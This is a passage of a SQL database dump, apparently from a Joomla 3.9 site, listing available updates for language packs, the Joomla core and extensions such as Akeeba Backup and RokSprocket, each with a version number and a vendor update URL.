US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16717,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16718,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16719,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16720,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16721,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16722,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16723,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16724,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16725,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16726,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16727,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16728,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16729,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16730,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16731,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16732,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16733,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16734,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16735,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16736,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16737,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16738,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16739,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16740,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16741,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16742,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16743,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16744,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16745,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16746,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16747,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16748,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16749,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16750,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16751,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16752,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16753,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16754,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16755,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16756,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16757,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16758,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16759,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16760,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16761,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16762,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16763,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16764,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16765,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16766,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16767,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16768,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16769,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16770,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16771,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16772,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16773,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16774,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16775,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16776,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16777,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16778,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16779,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16780,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16781,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16782,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16783,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16784,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16785,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16786,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16787,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16788,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16789,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16790,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16791,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16792,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16793,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16794,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16795,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16796,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16797,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16798,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16799,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(16800,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16801,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-0.html',''),(16802,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16803,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16804,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16805,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16806,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16807,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16808,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16809,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16810,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16811,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16812,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16813,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16814,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16815,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16816,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16817,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16818,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16819,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16820,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16821,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16822,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16823,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16824,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16825,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16826,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16827,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16828,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16829,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16830,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16831,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16832,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16833,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16834,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16835,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16836,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16837,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16838,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16839,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16840,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16841,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16842,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16843,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16844,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16845,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16846,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16847,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16848,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16849,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16850,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16851,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16852,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16853,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16854,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16855,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16856,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16857,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16858,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16859,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16860,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16861,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16862,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16863,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16864,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16865,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16866,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16867,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16868,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16869,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16870,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16871,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16872,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16873,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16874,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16875,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16876,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16877,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16878,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16879,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16880,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16881,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16882,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16883,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16884,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16885,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16886,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16887,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16888,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16889,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16890,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16891,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16892,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16893,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16894,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16895,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16896,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16897,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16898,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16899,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16900,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16901,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16902,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16903,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16904,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16905,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16906,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16907,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16908,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16909,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16910,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(16911,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(16912,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16913,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(16914,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16915,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16916,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(16917,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16918,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16919,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16920,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16921,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(16922,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16923,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16924,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16925,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16926,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16927,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16928,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16929,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16930,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.o